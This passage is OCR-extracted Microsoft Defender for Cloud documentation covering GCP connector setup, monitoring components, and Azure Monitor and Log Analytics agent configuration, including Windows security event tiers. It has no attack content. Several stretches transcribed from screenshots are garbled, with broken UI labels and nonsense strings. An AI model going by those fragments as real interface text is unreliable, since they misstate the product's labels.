5. Specify Role as Defender for Cloud Admin Viewer, and then select Continue. 


6. The Grant users access to this service account section is optional. Select Done. 


7. Copy the Email value information for the created service account, and save it for 
later use. 


8. In the IAM & admin section of the left menu, select IAM, and then: 
a. Switch to the organization level. 
b. Select ADD. 


c. In the New members box, paste the Email value information that you copied 
earlier. 


d. Specify the role as Security Center Admin Viewer, and then select Save. 


Add members to "Project ABC” 


Add members, roles to “Project ABC" project 


Enter one or more members below. Then select a role for these members to grant them 
access to your resources. Multiple roles allowed. Learn more 


New members 
@ 
Select a re erra Condition 
f a 
F pew fiter 
as E 
E Security Center Admin 
‘Security Center Admin Editor 
| Serveriess VPC Ace... 
Service Accounts Asmin Read access to security center 
Service Agent Roles 
Service Consumer .. 
Service Directory 
E 
Service Management GO 
MANAGE ROLES 


Create a private key for the dedicated service account 
1. Switch to the project level. 
2. In the IAM & admin section of the left menu, select Service accounts. 
3. Open the dedicated service account, and then select Edit. 
4. In the Keys section, select ADD KEY > Create new key. 
5. On the Create private key pane, select JSON, and then select CREATE. 


6. Save this JSON file for later use. 


Connect GCP to Defender for Cloud 


1. From the Defender for Cloud menu, open Environment settings. Then select the 
option to switch back to the classic connectors experience. 


ill Microsoft Defender for Cloud | Environment settings 
AE Shov 


howing 75 subscriptions 
P Search (Ctrl+/) | « ++ Add environment O Refresh 
General Zei 7 5 GE 7 
D overview Azure subscriptions AWS accounts 


@ Getting started 
= Recommendations 
© security alerts 


TZ Inventory 


@ welcome to the new multi-cloud account management page 


| P Search by name 


To switch back to the classic cloud connectors experience, click here. 


Name Ty Total resources Ty Defender coverage Ty Standards Ty 
@ Workbooks 

WV © Azure 
SE Comani > OA) 727988 5117 A Limited permissions 
diardute > ñ] 4b2462 905 A Limited permissions 
Cloud Security VY © AWS (preview) 
© Secure Score ES AWSNinjaconnector 254 3/3 plans AWS CIS 1.2.0 (preview), AWS Foundational ... 
@ Regulatory compliance ES securityConnector 1573 3/3 plans AWS CIS 1,2.0 (preview), AWS Foundational ... 
Q Workload protections > EJ MasterAwsProd 40 1/3 plans AWS CIS 1.2.0 (preview), AWS Foundational ... 
=% Firewall Manager B daasdf 1 3/3 plans AWS CIS 1.2.0 (preview), AWS Foundational ... 
Management E kedamari 1 a3 plans AWS Foundational Security Best Practices (p... 

[ecm 

a Security solutions 
ZA Workflow automation Q 


2. Select Add GCP project. 
3. On the onboarding page: 
a. Validate the chosen subscription. 
b. In the Display name box, enter a display name for the connector. 


c. In the Organization ID box, enter your organization's ID. If you don't know it, 
see the Google guide Creating and managing organizations £. 


d. In the Private key box, browse to the JSON file that you downloaded when you 
created a private key for the dedicated service account. 


4. Select Next. 


Confirm the connection 


After you successfully create the connector and properly configure GCP Security 
Command Center: 


e The GCP CIS standard appears in the regulatory compliance dashboard in 
Defender for Cloud. 


e Security recommendations for your GCP resources appear in the Defender for 
Cloud portal and the regulatory compliance dashboard 5 to 10 minutes after 
onboarding finishes. 


| Ø Search recommendations 


Controls 

> Remediate vulnerabilities 

> Enable encryption at rest 

> Remediate security configurations 
> Apply system updates 

> Apply adaptive application control 


V Enable auditing and logging 


Quick Fix! 


Diagnostic logs in loT Hub should be enabled 
Diagnostic logs in Event Hub should be enabled 
Diagnostic logs in Logic Apps should be enabled 


Ensure that sinks are configured for a Preview 


Ensure log metric filter and alerts exist for project owne ... 
Ensure that the log metric filter and alerts exist for Audi... 
Ensure that the log metric filter and alerts exist for Custo... 
Ensure that the log metric filter and alerts exist for VPC ... 


Ensure that the log metric filter and alerts exist for VPC ... 


Ensure that the log metric filter and alerts exist for Clo ... 


Group by controls: €D On 


Unhealthy resources 
42 of 63 resources 
31 of 39 resources 
29 of 38 resources 
9 of 39 resources 

13 of 33 resources 
29 of 33 resources 


-X 1of1 loT Hubs 


KI 


ZZ 1 of 1 event hub namespaces 


UZ 


{&} 19 of 20 logic apps 

© 3 of 3 GCP resources 
© 3 of 3 GCP resources 
© 3 of 3 GCP resources 
© 3 of 3 GCP resources 
© 3 of 3 GCP resources 


© 3 of 3 GCP resources 


© 3 of 3 GCP resources 


Remove classic GCP connectors 


Resource Health 


To remove any connectors that you created by using the classic connectors experience: 


1. Sign in to the Azure portal £. 


2. Go to Defender for Cloud > Environment settings. 


3. Select the option to switch back to the classic connectors experience. 


ill Microsoft Defender for Cloud | Environment settings 


Showing 75 subscriptions 


[e Search (Ctrl+/) | « + Add environment v © Refresh 
General 5 75 a 7 

© overview Azure subscriptions AWS accounts 
@ Getting started 


GO 


Recommendations 


Security alerts | P Search by name 


o 
rn inventory 
a4 


Name Ty 
Workbooks 
VM GO Azure 
#3 Community 
> ©) 72f988 
Diagnose and solve problems e 
dde p > (9) 4b2462 
Cloud Security bei © AWS (preview) 


© Secure Score 
@ Regulatory compliance 
D Workload protections 


E, Firewall Manager 


Management 


IT Environment settings © 


Security solutions 


ZA Workflow automation 


ES AWSNinjaConnector 

E securityConnector 
> E MasterAwsProd 

E daasdf 


E kedamari 


@ welcome to the new multi-cloud account management page 


Total resources Ty 


5117 


905 


1573 


Defender coverage Ty 


To switch back to the classic cloud connectors experience, click here. 


Standards Ty 


A Limited permissions 


A Limited permissions 


AWS CIS 1,2.0 (preview), AWS Foundational ... 
AWS CIS 1.2.0 (preview), AWS Foundational ... 
AWS CIS 1.2.0 (preview), AWS Foundational ... 
AWS CIS 1.2.0 (preview), AWS Foundational ... 


AWS Foundational Security Best Practices (p... 


A 


4. For each connector, select the ellipsis (...) button at the end of the row, and then 
select Delete. 


Next steps 


e Protect all of your resources with Defender for Cloud 


How does Defender for Cloud collect 
data? 


Article e 08/03/2023 


Defender for Cloud collects data from your Azure virtual machines (VMs), Virtual 
Machine Scale Sets, laaS containers, and non-Azure (including on-premises) machines to 
monitor for security vulnerabilities and threats. Some Defender plans require monitoring 
components to collect data from your workloads. 


Data collection is required to provide visibility into missing updates, misconfigured OS 
security settings, endpoint protection status, and health and threat protection. Data 
collection is only needed for compute resources such as VMs, Virtual Machine Scale 
Sets, laaS containers, and non-Azure computers. 


You can benefit from Microsoft Defender for Cloud even if you don't provision agents. 
However, you'll have limited security and the capabilities listed above aren't supported. 


Data is collected using: 


e Azure Monitor Agent (AMA) 

e Microsoft Defender for Endpoint (MDE) 

e Log Analytics agent 

e Security components, such as the Azure Policy Add-on for Kubernetes 


Why use Defender for Cloud to deploy 
monitoring components? 


Visibility into the security of your workloads depends on the data that the monitoring 
components collect. The components ensure security coverage for all supported 
resources. 


To save you the process of manually installing the extensions, Defender for Cloud 
reduces management overhead by installing all required extensions on existing and new 
machines. Defender for Cloud assigns the appropriate Deploy if not exists policy to the 
workloads in the subscription. This policy type ensures the extension is provisioned on 
all existing and future resources of that type. 


@ Tip 


Learn more about Azure Policy effects, including Deploy if not exists, in 
Understand Azure Policy effects. 


What plans use monitoring components? 


These plans use monitoring components to collect data: 


e Defender for Servers 
o Azure Arc agent (For multicloud and on-premises servers) 
o Microsoft Defender for Endpoint 
o Vulnerability assessment 
o Azure Monitor Agent or Log Analytics agent 

e Defender for SQL servers on machines 
o Azure Arc agent (For multicloud and on-premises servers) 
o Azure Monitor Agent or Log Analytics agent 
o Automatic SQL server discovery and registration 

e Defender for Containers 
o Azure Arc agent (For multicloud and on-premises servers) 
o Defender profile, Azure Policy Extension, Kubernetes audit log data 


Availability of extensions 


The Azure Preview Supplemental Terms E include additional legal terms that apply to 
Azure features that are in beta, preview, or otherwise not yet released into general 
availability. 


Azure Monitor Agent (AMA) 


Aspect Details 
Release state: Preview 
Relevant Defender plan: - Security posture management (CSPM) (enabled by default) for 


Endpoint protection assessment 
- Microsoft Defender for Servers Plan 2 for adaptive application 
controls, fileless attack detection, and file integrity monitoring 


Required roles and Owner 
permissions (subscription- 
level): 


Aspect 


Supported destinations: 


Policy-based: 


Clouds: 


Details 


OO Azure virtual machines 


go Azure Arc-enabled machines 


© Yes 


© Commercial clouds 


* Azure Government, Microsoft Azure operated by 21Vianet 


Learn more about using the Azure Monitor Agent with Defender for Cloud. 


Log Analytics agent 


Aspect 
Release state: 


Relevant Defender 
plan: 


Required roles and 
permissions 
(subscription-level): 


Supported 
destinations: 


Policy-based: 


Clouds: 


Azure virtual machines 
Generally available (GA) 


Foundational Cloud Security 
Posture Management (CSPM) for 
agent-based security 
recommendations 

Microsoft Defender for Servers 
Microsoft Defender for SQL 


Owner 


© Azure virtual machines 


XI No 


© Commercial clouds 
© Azure Government, Microsoft 
Azure operated by 21Vianet 


Azure Arc-enabled machines 
Generally available (GA) 


Foundational Cloud Security 
Posture Management (CSPM) for 
agent-based security 
recommendations 

Microsoft Defender for Servers 
Microsoft Defender for SQL 


Owner 


OO Azure Arc-enabled machines 


© Yes 


© Commercial clouds 
* Azure Government, Microsoft 
Azure operated by 21Vianet 


Supported operating systems for the Log Analytics agent 


Defender for Cloud depends on the Log Analytics agent. Ensure your machines are 


running one of the supported operating systems for this agent as described on the 


following pages: 


e Log Analytics agent for Windows supported operating systems 


e Log Analytics agent for Linux supported operating systems 


Also ensure your Log Analytics agent is properly configured to send data to Defender 
for Cloud 


Deploying the Log Analytics agent in cases of a pre-existing agent 
installation 


The following use cases explain how deployment of the Log Analytics agent works in 
cases when there's already an agent or extension installed. 


e Log Analytics agent is installed on the machine, but not as an extension (Direct 
agent) - If the Log Analytics agent is installed directly on the VM (not as an Azure 
extension), Defender for Cloud will install the Log Analytics agent extension and 
might upgrade the Log Analytics agent to the latest version. The installed agent 
will continue to report to its already configured workspaces and to the workspace 
configured in Defender for Cloud. (Multi-homing is supported on Windows 


machines.) 


If the Log Analytics is configured with a user workspace and not Defender for 
Cloud's default workspace, you'll need to install the "Security" or 
"SecurityCenterFree" solution on it for Defender for Cloud to start processing 
events from VMs and computers reporting to that workspace. 


For Linux machines, Agent multi-homing isn't yet supported. If an existing agent 
installation is detected, the Log Analytics agent won't be deployed. 


For existing machines on subscriptions onboarded to Defender for Cloud before 17 
March 2019, when an existing agent will be detected, the Log Analytics agent 
extension won't be installed and the machine won't be affected. For these 
machines, see to the "Resolve monitoring agent health issues on your machines" 
recommendation to resolve the agent installation issues on these machines. 


e System Center Operations Manager agent is installed on the machine - Defender 
for Cloud will install the Log Analytics agent extension side by side to the existing 
Operations Manager. The existing Operations Manager agent will continue to 
report to the Operations Manager server normally. The Operations Manager agent 
and Log Analytics agent share common run-time libraries, which will be updated to 
the latest version during this process. 


e A pre-existing VM extension is present: 

o When the Monitoring Agent is installed as an extension, the extension 
configuration allows reporting to only a single workspace. Defender for Cloud 
doesn't override existing connections to user workspaces. Defender for Cloud 
will store security data from the VM in the workspace already connected, if the 


"Security" or "SecurityCenterFree" solution has been installed on it. Defender for 
Cloud may upgrade the extension version to the latest version in this process. 

o To see to which workspace the existing extension is sending data to, run the 
TestCloudConnection.exe tool to validate connectivity with Microsoft Defender 
for Cloud, as described in Verify Log Analytics Agent connectivity. Alternatively, 
you can open Log Analytics workspaces, select a workspace, select the VM, and 
look at the Log Analytics agent connection. 

o If you have an environment where the Log Analytics agent is installed on client 
workstations and reporting to an existing Log Analytics workspace, review the 
list of operating systems supported by Microsoft Defender for Cloud to make 


sure your operating system is supported. 


Learn more about working with the Log Analytics agent. 


Microsoft Defender for Endpoint 


Aspect 


Release 


Relevant Defender 


plan: 


Required roles and 
permissions 


Linux 
state: Generally available (GA) 


Microsoft Defender for 
Servers 


Contributor or Security 
Admin 


(subscription-level): 


Windows 
Generally available (GA) 


Microsoft Defender for Servers 


Contributor or Security Admin 


Supported © Azure Arc-enabled D azure Arc-enabled machines 
destinations: machines © azure VMs running Windows Server 
Lv] Azure virtual 2022, 2019, 2016, 2012 R2, 2008 R2 SP1, 
machines Azure Virtual Desktop, Windows 10 
Enterprise multi-session 
* Azure VMs running Windows 10 
Policy-based: * No * No 


Clouds: 


OO Commercial clouds 
* Azure Government, 
Microsoft Azure 

operated by 21Vianet 


© Commercial clouds 
© Azure Government, Microsoft Azure 
operated by 21Vianet 


Learn more about Microsoft Defender for Endpoint. 


Vulnerability assessment 


Aspect 
Release state: 
Relevant Defender plan: 


Required roles and permissions 
(subscription-level): 


Supported destinations: 


Policy-based: 


Clouds: 


Guest Configuration 


Aspect 
Release state: 
Relevant Defender plan: 


Required roles and permissions 
(subscription-level): 


Supported destinations: 


Clouds: 


Details 
Generally available (GA) 
Microsoft Defender for Servers 


Owner 


go Azure virtual machines 
go Azure Arc-enabled machines 


© Yes 


(v) Commercial clouds 
* Azure Government, Microsoft Azure operated 
by 21Vianet 


Details 
Preview 
No plan required 


Owner 


OO Azure virtual machines 


OO Commercial clouds 
* Azure Government, Microsoft Azure operated 
by 21Vianet 


Learn more about Azure's Guest Configuration extension. 


Defender for Containers extensions 


This table shows the availability details for the components that are required by the 


protections offered by Microsoft Defender for Containers. 


By default, the required extensions are enabled when you enable Defender for 


Containers from the Azure portal. 


Aspect 


Release state: 


Relevant Defender plan: 


Required roles and 
permissions (subscription- 
level): 


Supported destinations: 


Policy-based: 


Clouds: 


Azure Kubernetes Service 
clusters 


e Defender profile: GA 
e Azure Policy add-on: Generally 
available (GA) 


Microsoft Defender for Containers 


Owner or User Access 
Administrator 


The AKS Defender profile only 
supports AKS clusters that have 
RBAC enabled. 


© Yes 


Defender profile: 

Lv] Commercial clouds 

* Azure Government, Microsoft 
Azure operated by 21Vianet 
Azure Policy add-on: 

Lv] Commercial clouds 

© azure Government, Microsoft 
Azure operated by 21Vianet 


Azure Arc-enabled 
Kubernetes clusters 


e Defender extension: Preview 
e Azure Policy extension: 
Preview 


Microsoft Defender for 
Containers 


Owner or User Access 
Administrator 


See Kubernetes distributions 
supported for Arc-enabled 
Kubernetes 


© Yes 


Defender extension: 
Commercial clouds 

* Azure Government, 

Microsoft Azure operated by 

21Vianet 

Azure Policy extension for 

Azure Arc: 

OO Commercial clouds 

* Azure Government, 

Microsoft Azure operated by 

21Vianet 


Learn more about the roles used to provision Defender for Containers extensions. 


Troubleshooting 


e To identify monitoring agent network requirements, see Troubleshooting 


monitoring agent network requirements. 


e To identify manual onboarding issues, see How to troubleshoot Operations 


Management Suite onboarding issues £. 


Next steps 


This page explained what monitoring components are and how to enable them. 


Learn more about: 


e Setting up email notifications for security alerts 
e Protecting workloads with the Defender plans 


Deploy the Azure Monitor Agent to 
protect your servers with Microsoft 
Defender for Cloud 


Article e 06/18/2023 


To make sure that your server resources are secure, Microsoft Defender for Cloud uses 
agents installed on your servers to send information about your servers to Microsoft 
Defender for Cloud for analysis. You can quietly deploy the Azure Monitor Agent on 


your servers when you enable Defender for Servers. 


In this article, we're going to show you how to deploy the agent so that you can protect 


your servers. 


Availability 


Aspect Details 
Release state: Preview 
Relevant Defender plan: - Security posture management (CSPM) (enabled by default) for 


Endpoint protection assessment 
- Microsoft Defender for Servers Plan 2 for adaptive application 
controls, fileless attack detection, and file integrity monitoring 


Required roles and Owner 
permissions (subscription- 
level): 
Supported destinations: © Azure virtual machines 
© Azure Arc-enabled machines 
Policy-based: (v) Yes 
Clouds: © Commercial clouds 
* Azure Government, Azure China 21Vianet 
Prerequisites 


Before you deploy AMA with Defender for Cloud, you must have the following 


prerequisites: 


e Make sure your multicloud and on-premises machines have Azure Arc installed. 


o AWS and GCP machines 
o Onboard your AWS connector and auto provision Azure Arc. 
o Onboard your GCP connector and auto provision Azure Arc. 
o On-premises machines 
o Install Azure Arc. 
e Make sure the Defender plans that you want the Azure Monitor Agent to support 
are enabled: 
o Enable Defender for Servers Plan 2 on Azure and on-premises VMs 
o Enable Defender plans on the subscriptions for your AWS VMs 
o Enable Defender plans on the subscriptions for your GCP VMs 


Deploy the Azure Monitor Agent with Defender 
for Cloud 


To deploy the Azure Monitor Agent with Defender for Cloud: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


4. Enable deployment of the Azure Monitor Agent: 


BIT ag 


a. For the Log Analytics agent/Azure Monitor Agent, select the On status. 


Component 


In the Configuration column, you can see the enabled agent type. When you 
enable Defender plans, Defender for Cloud decides which agent to provision 
based on your environment. In most cases, the default is the Log Analytics 
agent. 


b. For the Log Analytics agent/Azure Monitor Agent, select Edit configuration. 


c. For the Autoprovisioning configuration agent type, select Azure Monitor Agent. 


Auto-provisioning configuration x 
Log analytics agent 


Agent type 


O Log Analytics Agent (Default) 
Collects security-related configurations and event logs from the machine and stores the 


. D a OO AD . ALO . = Q D OG 


@) Azure Monitor Agent (Preview) 
Collects security-related configurations and event logs from the machine and stores the 


data in your Log Analytics workspace for analysis 


Workspace selection * © 


@) Default workspace(s) 


O Custom workspace 


Security events storage * © 


(i) Security events c figurati for Azure M It Agent IS not availaDie t ugh MDC port 


\ be set manually. Learn more > 


(i) If a VM already has either SCOM or OMS agent installed locally, the Log Analytics agent extension 
will still be installed and connected to the configured workspace. 
Any other solutions enabled on the selected workspace will be applied to Azure VMs that are 
connected to it. For paid solutions, this could result in additional charges. 
For data privacy considerations, please make sure your selected workspace is in your desired 
region. 


E 


By default: 


e The Azure Monitor Agent is installed on all existing machines in the selected 
subscription, and on all new machines created in the subscription. 

e The Log Analytics agent isn't uninstalled from machines that already have it 
installed. You can leave the Log Analytics agent on the machine, or you can 
manually remove the Log Analytics agent if you don't require it for other 
protections. 

e The agent sends data to the default workspace for the subscription. You can 
also configure a custom workspace to send data to. 

e You can't enable collection of other security events. 


Impact of running with both the Log Analytics 
and Azure Monitor Agents 


You can run both the Log Analytics and Azure Monitor Agents on the same machine, but 
you should be aware of these considerations: 


e Certain recommendations or alerts are reported by both agents and appear twice 
in Defender for Cloud. 

e Each machine is billed once in Defender for Cloud, but make sure you track billing 
of other services connected to the Log Analytics and Azure Monitor, such as the 
Log Analytics workspace data ingestion. 

e Both agents have performance impact on the machine. 


When you enable Defender for Servers Plan 2, Defender for Cloud decides which agent 
to provision. In most cases, the default is the Log Analytics agent. 


Learn more about migrating to the Azure Monitor Agent. 


Custom configurations 


Configure custom destination Log Analytics workspace 


When you install the Azure Monitor Agent with autoprovisioning, you can define the 
destination workspace of the installed extensions. By default, the destination is the 
“default workspace” that Defender for Cloud creates for each region in the subscription: 
defaultWorkspace-<subscriptionId>-<regionShortName>. Defender for Cloud 
automatically configures the data collection rules, workspace solution, and other 
extensions for that workspace. 


If you configure a custom Log Analytics workspace: 


e Defender for Cloud only configures the data collection rules and other extensions 
for the custom workspace. You have to configure the workspace solution on the 
custom workspace. 

e Machines with Log Analytics agent that reports to a Log Analytics workspace with 
the security solution are billed even when the Defender for Servers plan isn't 
enabled. Machines with the Azure Monitor Agent are billed only when the plan is 
enabled on the subscription. The security solution is still required on the 
workspace to work with the plans features and to be eligible for the 500-MB 
benefit. 


To configure a custom destination workspace for the Azure Monitor Agent: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


Home 


e Settings | Defender plans ~! 


j | save 3 Settings & monitoring 


Enable all plans 


© Cloud Security Posture Manage 
agurren ath 
Monitoring coverage statue 
Oru ) 
e (co ZZ. 
CD o 


Oru w) 
Oru Co. er 
Oru E: 
Sra o M 


When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 30 days are free, 
For more information on Defender for Cloud pricing, visit the pricing page. 


4. For the Log Analytics agent/Azure Monitor Agent, select Edit configuration. 


When you enable an extension, it willbe installed on any new or existing resource. by assigning a security policy. 


erek Ga e eg beg Se 
GE ETETEN es 
Vulnerability assessment for machines Enables vulnerability assessment on your Azure and hybrid machines, Learn more a d n 

Agentiess scanning tor machines Seans your machines ter stalled software and vulnerabilities wtheut relying an agents or impacting machine performance. Les mere en eres GO 


5. Select Custom workspace, and select the workspace that you want to send data to. 


Auto-provisioning configuration x 
Log analytics agent 


Agent type 


O Log Analytics Agent (Default) 
Collects security-related configurations and event logs from the machine and stores the 


ace for analysis 
(@) Azure Monitor Agent (Preview 


z ations and event logs from the machine and stores the 
data in your Log Analytics workspace for analysis 


Workspace selection * © 


(i) When selecting a custom workspace, make sure the relevant solutions are enabled on it. 
Learn more > 


Security events storage * © 


(i) Security events configuration for Azure Monitor Agent is not available through MDC porta 


be set manually. Learn more > 


(i) If a VM already has either SCOM or OMS agent installed locally, the Log Analytics agent extension 
will still be installed and connected to the configured workspace. 
Any other solutions enabled on the selected workspace will be applied to Azure VMs that are 
connected to it. For paid solutions, this could result in additional charges. 
For data privacy considerations, please make sure your selected workspace is in your desired 
region. 


a 


Log analytics workspace solutions 


The Azure Monitor Agent requires Log analytics workspace solutions. These solutions 
are automatically installed when you autoprovision the Azure Monitor Agent with the 
default workspace. 


The required Log Analytics workspace solutions for the data that you're collecting are: 


e Security posture management (CSPM) — SecurityCenterFree solution 


e Defender for Servers Plan 2 — Security solution 


Other extensions for Defender for Cloud 


The Azure Monitor Agent requires more extensions. The ASA extension, which supports 
endpoint protection recommendations, fileless attack detection, and Adaptive 
Application controls, is automatically installed when you autoprovision the Azure 
Monitor Agent. 


Other security events collection 


When you autoprovision the Log Analytics agent in Defender for Cloud, you can choose 
to collect other security events to the workspace. When you autoprovision the Azure 
Monitor agent in Defender for Cloud, the option to collect other security events to the 
workspace isn't available. Defender for Cloud doesn't rely on these security events, but 
they can be helpful for investigations through Microsoft Sentinel. 


If you want to collect security events when you autoprovision the Azure Monitor Agent, 
you can create a Data Collection Rule to collect the required events. Learn how do it 
with PowerShell or with Azure Policy”. 


Like for Log Analytics workspaces, Defender for Cloud users are eligible for 500 MB of 
free data daily on defined data types that include security events. 


Next steps 


Now that you enabled the Azure Monitor Agent, check out the features that are 
supported by the agent: 


e Endpoint protection assessment 
e Adaptive application controls 

e Fileless attack detection 

e File Integrity Monitoring 


Collect data from your workloads with the Log 
Analytics agent 


Article * 07/31/2023 


Configure the Log Analytics agent and workspaces 


When the Log Analytics agent is on, Defender for Cloud deploys the agent on all supported Azure VMs and 
any new ones created. For the list of supported platforms, see Supported platforms in Microsoft Defender for 
Cloud. 


To configure integration with the Log Analytics agent: 
1. From Defender for Cloud's menu, open Environment settings. 
2. Select the relevant subscription. 
3. In the Monitoring Coverage column of the Defender plans, select Settings. 


4. From the configuration options pane, define the workspace to use. 


Agent deployment configuration x 


Log Analytics agent for virtual machines 


Workspace configuration 


Data collected by Microsoft Defender for Cloud is stored in Log Analytics workspace(s). 
You can select to have data collected from Azure VMs stored in workspace(s) created by 
Microsoft Defender for Cloud or in an existing workspace you created. Learn more > 


| Connect Azure VMs to the default workspace(s) created by Microsoft Defender for Cloud 


(@) Connect Azure VMs to a different workspace 


| NSGL v 


Store additional raw data - Windows security events 


To help audit, investigate, and analyze threats, you can collect raw events, logs, and 
additional security data and save it to your Log Analytics workspace. 


Select the level of data to store for this workspace. Charges will apply for all settings other 
than "None". Learn more 


=) All Events All Windows security and AppLocker events. 


( D Common A standard set of events for auditing purposes. 


È Minimal A small set of events that might indicate potential threats. 
By enabling this option, you won't be able to have a full audit trail. 


S ) None No security or AppLocker events. 


Cena] d 


e Connect Azure VMs to the default workspaces created by Defender for Cloud - Defender for 
Cloud creates a new resource group and default workspace in the same geolocation, and connects 


the agent to that workspace. If a subscription contains VMs from multiple geolocations, Defender 
for Cloud creates multiple workspaces to ensure compliance with data privacy requirements. 


The naming convention for the workspace and resource group is: 
o Workspace: DefaultWorkspace-[subscription-ID]-[geo] 
o Resource Group: DefaultResourceGroup-[geo] 


A Defender for Cloud solution is automatically enabled on the workspace per the pricing tier set 
for the subscription. 


b Tip 


For questions regarding default workspaces, see: 
o Am | billed for Azure Monitor logs on the workspaces created by Defender for Cloud? 


o Where is the default Log Analytics workspace created? 


o Can I delete the default workspaces created by Defender for Cloud? 


e Connect Azure VMs to a different workspace - From the dropdown list, select the workspace to 
store collected data. The dropdown list includes all workspaces across all of your subscriptions. You 
can use this option to collect data from virtual machines running in different subscriptions and 
store it all in your selected workspace. 


If you already have an existing Log Analytics workspace, you might want to use the same 
workspace (requires read and write permissions on the workspace). This option is useful if you're 
using a centralized workspace in your organization and want to use it for security data collection. 
Learn more in Manage access to log data and workspaces in Azure Monitor. 


If your selected workspace already has a "Security" or "SecurityCenterFree” solution enabled, the 

pricing will be set automatically. If not, install a Defender for Cloud solution on the workspace: 

a. From Defender for Cloud's menu, open Environment settings. 

b. Select the workspace to which you'll be connecting the agents. 

c. Set Security posture management to on or select Enable all to turn all Microsoft Defender plans 
on. 


5. From the Windows security events configuration, select the amount of raw event data to store: 


e None - Disable security event storage. (Default) 

e Minimal- A small set of events for when you want to minimize the event volume. 

e Common -A set of events that satisfies most customers and provides a full audit trail. 
e All events — For customers who want to make sure all events are stored. 


Ọ Tip 


To set these options at the workspace level, see Setting the security event option at the 
workspace level. 


For more information of these options, see Windows security event options for the Log Analytics 
agent. 


6. Select Apply in the configuration pane. 


Windows security event options for the Log Analytics 
agent 


When you select a data collection tier in Microsoft Defender for Cloud, the security events of the selected tier 
are stored in your Log Analytics workspace so that you can investigate, search, and audit the events in your 
workspace. The Log Analytics agent also collects and analyzes the security events required for Defender for 
Cloud's threat protection. 


Requirements 


The enhanced security protections of Defender for Cloud are required for storing Windows security event 
data. Learn more about the enhanced protection plans. 


You may be charged for storing data in Log Analytics. For more information, see the pricing page”. 


Information for Microsoft Sentinel users 


Security events collection within the context of a single workspace can be configured from either Microsoft 
Defender for Cloud or Microsoft Sentinel, but not both. If you want to add Microsoft Sentinel to a workspace 
that already gets alerts from Microsoft Defender for Cloud and to collect Security Events, you can either: 


e Leave the Security Events collection in Microsoft Defender for Cloud as is. You'll be able to query and 
analyze these events in both Microsoft Sentinel and Defender for Cloud. If you want to monitor the 
connector's connectivity status or change its configuration in Microsoft Sentinel, consider the second 
option. 

e Disable Security Events collection in Microsoft Defender for Cloud and then add the Security Events 
connector in Microsoft Sentinel. You'll be able to query and analyze events in both Microsoft Sentinel, 
and Defender for Cloud, but you'll also be able to monitor the connector's connectivity status or change 
its configuration in - and only in - Microsoft Sentinel. To disable Security Events collection in Defender 
for Cloud, set Windows security events to None in the configuration of your Log Analytics agent. 


What event types are stored for "Common" and "Minimal"? 


The Common and Minimal event sets were designed to address typical scenarios based on customer and 
industry standards for the unfiltered frequency of each event and their usage. 


e Minimal - This set is intended to cover only events that might indicate a successful breach and 
important events with low volume. Most of the data volume of this set is successful user logon (event ID 
4624), failed user logon events (event ID 4625), and process creation events (event ID 4688). Sign out 
events are important for auditing only and have relatively high volume, so they aren't included in this 
event set. 

e Common - This set is intended to provide a full user audit trail, including events with low volume. For 
example, this set contains both user logon events (event ID 4624) and user logoff events (event ID 
4634). We include auditing actions like security group changes, key domain controller Kerberos 


operations, and other events that are recommended by industry organizations. 


Here's a complete breakdown of the Security and App Locker event IDs for each set: 


Data Collected event indicators 
tier 


Minimal 1102,4624,4625,4657,4663,4688,4700,4702,4719,4720,4722,4723,4724,4727,4728,4732,4735,4737,4739,4740,4754,4755, 
4756,4767,4799,4825,4946,4948,4956,5024,5033,8001,8002,8003,8004,8005,8006,8007,8222 

Common _— 1,299,300,324,340,403,404,410,411,412,413,431,500,501,1100,1102,1107,1108,4608,4610,4611,4614,4622, 
4624,4625,4634,4647,4648,4649,4657,4661,4662,4663,4665,4666,4667,4688,4670,4672,4673,4674,4675,4689,4697, 
4700,4702,4704,4705,4716,4717,4718,4719,4720,4722,4723,4724,4725,4726,4727,4728,4729,4733,4732,4735,4737, 
4738,4739,4740,4742,4744,4745,4746,4750,4751,4752,4754,4755,4756,4757,4760,4761,4762,4764,4767,4768,4771, 
4774,4778,4779,4781,4793,4797,4798,4799,4800,4801,4802,4803,4825,4826,4870,4886,4887,4888,4893,4898,4902, 
4904,4905,4907,4931,4932,4933,4946,4948,4956,4985,5024,5033,5059,5136,5137,5140,5145,5632,6144,6145,6272, 


6273,6278,6416,6423,6424,8001,8002,8003,8004,8005,8006,8007,8222,26401,30004 


© Note 


e If you are using Group Policy Object (GPO), it is recommended that you enable audit policies 
Process Creation Event 4688 and the CommandLine field inside event 4688. For more information 
about Process Creation Event 4688, see Defender for Cloud's common questions. For more 
information about these audit policies, see Audit Policy Recommendations. 

e To enable data collection for Adaptive application controls, Defender for Cloud configures a local 
AppLocker policy in Audit mode to allow all applications. This will cause AppLocker to generate 
events which are then collected and leveraged by Defender for Cloud. It is important to note that 
this policy will not be configured on any machines on which there is already a configured 
AppLocker policy. 

e To collect Windows Filtering Platform Event ID 5156, you need to enable Audit Filtering Platform 


Connection (Auditpol /set /subcategory:"Filtering Platform Connection" /Success:Enable) 


Setting the security event option at the workspace level 
You can define the level of security event data to store at the workspace level. 
1. From Defender for Cloud's menu in the Azure portal, select Environment settings. 


2. Select the relevant workspace. The only data collection events for a workspace are the Windows security 


events described on this page. 


s Settings | Data collection & x 


as-ws 


| Ø Search (Ctrl+/) | « 5 


Settings Store additional raw data - Windows security events 


IF] Microsoft Defender for Goud plans To help audit, investigate, and analyze threats, you can collect raw events, 


; logs, and additional security data and save it to your Log Analytics workspace. 
~ Data collection 


Select the level of data to store for this workspace. 


Charges will apply for all settings other than “None”. 
Learn more 


All Events 


All Windows security and AppLocker events. 


Common 


A standard set of events for auditing purposes. 


Minimal 


A small set of events that might indicate potential threats. 
By enabling this option, you won't be able to have a full audit trail. 


None 


No security or AppLocker events. 


3. Select the amount of raw event data to store and select Save. 


Manual agent provisioning 
To manually install the Log Analytics agent: 
1. In the Azure portal, navigate to the Defender for Cloud's Environment Settings page. 


2. Select the relevant subscription and then select Settings & monitoring. 


3. Turn Log Analytics agent/Azure Monitor Agent Off. 


Home 


Settings & monitoring 
ASC DEMO 
Continue 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. 


Defenders plans : All 


‘Component Description 


Defender plans Configuration 


